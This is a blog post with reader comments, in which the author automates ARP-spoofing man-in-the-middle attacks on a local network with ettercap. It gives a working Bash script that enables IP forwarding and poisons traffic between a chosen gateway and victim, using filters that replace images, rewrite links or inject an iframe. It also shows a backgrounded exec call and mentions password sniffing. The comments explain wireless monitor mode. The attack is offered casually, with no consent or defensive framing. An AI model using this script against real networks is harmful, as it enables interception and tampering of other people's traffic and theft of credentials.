Skip to content

Hacking Is So Easy, Even a Computer Can Do It

July 16, 2012

In The Avengers, there was a scene where Tony Stark had Jarvis hack into the Avengers mainframe.

I remember thinking, “how cool! I want to teach MY jarvis to do that!”.

Now, I don’t think any task is purely heuristic (except love, maybe?). Everything can be done systematically and/or algorithmically. It’s just a matter of discovering that system or algorithm. Even factoring large numbers (which, if discovered, will collapse the current state of online security).

So I decided to teach Jarvis to do a Man-In-The-Middle attack on any computer in the network. Man-in-the-Middle Attacks are easy to perform. With the right filters in place, you can do lots of cool things. I already created a bunch of different filters that do different things…. so it’s just a matter of automating that process.

First, I wrote a Bash script that runs different kinds of ettercap commands and filters and targets different IP’s.


#!/bin/bash

if [ $# -eq 0 ]
then
    kill -9 `ps -eo comm,pid | awk '$1 == "ettercap" { print $2 }'`
else
    sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
    if [ $3 = mickey ]
    then
        ettercap -i eth1 -T -q -F mickeymouse.ef -M arp:remote /$1/ /$2/
    elif [ $3 = link ]
    then
        ettercap -i eth1 -T -q -F hrefhack.ef -M arp:remote /$1/ /$2/
    else
        ettercap -i eth1 -T -q -F metasploit.ef -M arp:remote /$1/ /$2/
    fi
fi

note: running your script as anybody other than su will have insufficient permissions. I leave it up to you to handle that
note 2: Those .ef files are my compiled filters. If you want to learn more about ettercap filters, search google or read this.
The .ef files shown here are just 3 of many compiled ettercap filters. The mickeymouse.ef replaces all images with my mickey mouse image. The hrefhack.ef filter replaces all href links with http://cranklin.com links. The metasploit.ef filter takes over the entire page with a giant iframe with the contents of http://cranklin.com.
Yes… harmless but fun.

Now, all I have to do is add another Jarvis conditional to attack a given IP address, and have her run:
exec('mitmscript [gateway IP] [victim IP] [attack type] > /dev/null 2>/dev/nul &');

Yup! That easy! Let’s watch her in action!

For the sake of brevity, I limited the video to demonstrations of 2 different types of attacks. In actuality, Jarvis is capable of doing many different types of attacks including logging, password sniffing, packet injections, etc etc.
Oh Jarvis. :)

About these ads

From → Hacks

4 Comments
  1. Michael K's Blog permalink

    Ettercap, Wireshark, Aircrack and other packet capturing software wont work on my Ubuntu Linux 12.04. It says I need a compatible interface in monitor mode. I tried using Airmon-ng but that only created an interface called mon0 that only worked with Ettercap. How would I configure lo,eth0, or wlan0 to monitor mode? I have an HP Pavilon g6 laptop.

    • Hey Michael, try using the mon0 interface when using ettercap, wireshark, etc.. that’s created when running airmon-ng. What kind of chipset is your wireless network adapter? If it’s a softnic card and doesn’t support monitor/inject, you may need to purchase a different wireless adapter.

      • This is what I’ve had to do with my Asus 1005hab (Atheros chipset) and now my Latitude E6420 (Broadcom, though don’t use the proprietary drivers in Ubuntu). Works like a charm when targeting mon0. To start mon0, use the command ‘sudo airmon-ng start wlan0′. mon0 will then be active. From the non use mon0 as the interface.

  2. crazykidd permalink

    You could add a height paramter to the image tag, which would throw off websights natrual design and make your image the correct size :) Realy the possibilitys or endless

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 1,488 other followers

%d bloggers like this: